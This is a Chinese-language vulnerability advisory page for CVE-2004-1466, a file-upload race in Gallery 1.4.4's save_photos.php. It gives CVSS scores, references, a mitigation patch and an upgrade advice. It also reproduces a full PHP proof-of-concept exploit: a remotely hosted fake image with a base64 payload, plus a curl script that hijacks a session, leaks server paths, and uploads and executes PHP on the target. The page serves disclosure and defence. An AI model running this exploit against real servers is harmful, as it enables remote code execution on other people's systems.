CVE-2004-1466
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:28
NMCOE    

[原文]The set_time_limit function in Gallery before 1.4.4_p2 deletes non-image files in a temporary directory every 30 seconds after they have been uploaded using save_photos.php, which allows remote attackers to upload and execute execute arbitrary scripts before they are deleted, if the temporary directory is under the web root.


[CNNVD]Gallery save_photos.php上传执行任意文件漏洞(CNNVD-200412-1010)

        
        Gallery是一款基于WEB的图象管理系统。
        Gallery包含的'save_photos.php'存在输入验证问题,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        aCiDBiTS报告如果临时目录是WEB可访问目录,拥有上传权限的远程验证用户就可以使用 'URL method'方法建立任意PHP文件,然后通过WEB执行。
        报告认为文件在下载后,临时目录中的拷贝会保留30秒左右。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1466
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1466
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1010
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/10968
(PATCH)  BID  10968
http://www.gentoo.org/security/en/glsa/glsa-200409-05.xml
(PATCH)  GENTOO  GLSA-200409-05
http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=134&mode=thread&order=0&thold=0
(PATCH)  CONFIRM  http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=134&mode=thread&order=0&thold=0
http://xforce.iss.net/xforce/xfdb/17021
(UNKNOWN)  XF  gallery-savephotos-file-upload(17021)
http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0757.html
(UNKNOWN)  FULLDISC  20040817 Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept

- 漏洞信息

Gallery save_photos.php上传执行任意文件漏洞
高危 设计错误
2004-12-31 00:00:00 2006-08-17 00:00:00
远程  
        
        Gallery是一款基于WEB的图象管理系统。
        Gallery包含的'save_photos.php'存在输入验证问题,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
        aCiDBiTS报告如果临时目录是WEB可访问目录,拥有上传权限的远程验证用户就可以使用 'URL method'方法建立任意PHP文件,然后通过WEB执行。
        报告认为文件在下载后,临时目录中的拷贝会保留30秒左右。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * aCiDBiTS提供如下第三方解决方案:
        save_photos.php, line 154:
        $file = $gallery->app->tmpDir . "/photo.$name";
        插入:
        if(strlen($name)>20) $name=substr($name,strlen($name)-20);
        if (!acceptableFormat(strtolower(ereg_replace(".*\.([^\.]*)$", "\\1",
        $name)))) die( "\nInvalid file type!\n");
        $file = $gallery->app->tmpDir . "/photo.$name";
        厂商补丁:
        Gallery
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://gallery.sourceforge.net/

- 漏洞信息 (24383)

Gallery 1.4.4 Remote Server-Side Script Execution Vulnerability (EDBID:24383)
php webapps
2004-07-17 Verified
0 aCiDBiTS
N/A [点击下载]
source: http://www.securityfocus.com/bid/10968/info

A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function. 

The issue presents itself becuase the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.

Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well.

This is the content of galfakeimg.php. It has to be placed in a
remote web directory accessible by the gallery script.

---8-<-------------------------8-<-------------------------8<---
<?php
echo "<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcy
BnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
?>\n";
for($x=0;$x<65535;$x++) echo " \n";
while(1){}
?>
---8-<-------------------------8-<-------------------------8<---

*/


define( XEC_TIMEOUT, 5);

echo "+--------------------------------------------------------------+\n|
Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept |\n| By
aCiDBiTS acidbits@hotmail.com 17-August-2004
|\n+--------------------------------------------------------------+\n\n";


if($argc<3) die("Usage: ".$argv[0]." URL_to_fake_photo
URL_to_Gallery\n\n");
$host=$argv[2];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
$fakephoto=$argv[1];

echo "[+] Obtaining PHPSESSID ... \n ";
$webc=get_web($host."view_album.php?set_albumName=".$album[0], 1, '');
$temp=explode("PHPSESSID=",$webc);
$temp1=explode(";",$temp[1]);
$phps="PHPSESSID=".$temp1[0].";";
echo $phps;

echo "\n\n[+] Getting album names ...\n ";
$webc=get_web($host, 0, $phps);
$temp=explode("set_albumName=",$webc);
$nalbum=0;
while($temp[($nalbum*2)+1]){
$temp1= explode( "\"", $temp[($nalbum*2)+1]);
$album[$nalbum]=$temp1[0];
echo $album[$nalbum]." ";
$nalbum++;
}
if(!$nalbum) die(" Failed!\n\n");


echo "\n\n[+] Searching an album with permissions to add photos ...";
$walbum='';
foreach( $album as $temp){
$webc=get_web($host."view_album.php?set_albumName=".$temp, 0, $phps);
$webc=send_post( $host."save_photos.php",
urlencode("urls[]=".$host."&setCaption=1"), $phps);
echo "\n ".$temp." -> ";
if( ereg( "You are no allowed to perform this action", $webc) )
echo "No";
else {
echo "Yes";
$walbum=$temp;
}
}
if( !$walbum ) die ("\n\nFailed! No permissions in any album.\n\n");
echo "\n Using: ".$walbum;

echo "\n\n[+] Getting gallery & temporal directory paths ...";
$webc=get_web($host."view_album.php?set_albumName=".$walbum, 0, $phps);
$temp='/';
for($x=0;$x<256;$x++) $temp.='a';
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto.$temp)."&setCaption=1", $phps);
$temp=explode("fopen(\"",$webc);
$temp1=explode("photo",$temp[1]);
$tmpd=$temp1[0];
echo "\n Temporal directory: ".$tmpd;
$temp=explode("resource in <b>",$webc);
$temp1=explode("save_photo",$temp[1]);
$scrptd=$temp1[0];
echo "\n Gallery directory: ".$scrptd;

if( !ereg( $scrptd, $tmpd) ) die ("\n\nTemporal directory is out of
gallery's webtree. Can't continue.\n\n" );

$temp=explode("/",$fakephoto);
end($temp);
$sname=current($temp);
echo "\n\n[+] Uploading $sname and executing it ...";
$webc=send_post( $host."save_photos.php",
urlencode("urls[]")."=".urlencode($fakephoto)."&setCaption=1", $phps);
//Maybe you'll need to wait some more seconds, check XEC_TIMEOUT
$webc=get_web($host.str_replace($scrptd,'',$tmpd)."photo.".$sname, 0,
$phps);

echo "\n\n Now go to: ".$host.str_replace($scrptd,'',$tmpd)."test.php";

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\//||\\\\\n\n");


function get_web($url, $h, $cookie)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, $h);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}

function send_post($url,$data, $cookie)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_TIMEOUT, XEC_TIMEOUT) ;
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}		

- 漏洞信息

9019
Gallery save_photos.php Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

Gallery contains a flaw inside save_photos.php that will allow an attacker to upload arbitrary PHP script. The problem is that if the temporary directory is web-accessible, authenticated users with upload privileges may upload arbitrary PHP scripts which may then be executed. The script times out in 30 seconds if no more data is uploaded but in that 30 seconds an attacker can execute their uploaded PHP file.

- 时间线

2004-08-19 Unknow
2004-08-19 Unknow

- 解决方案

Upgrade to version 1.4.4-p11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站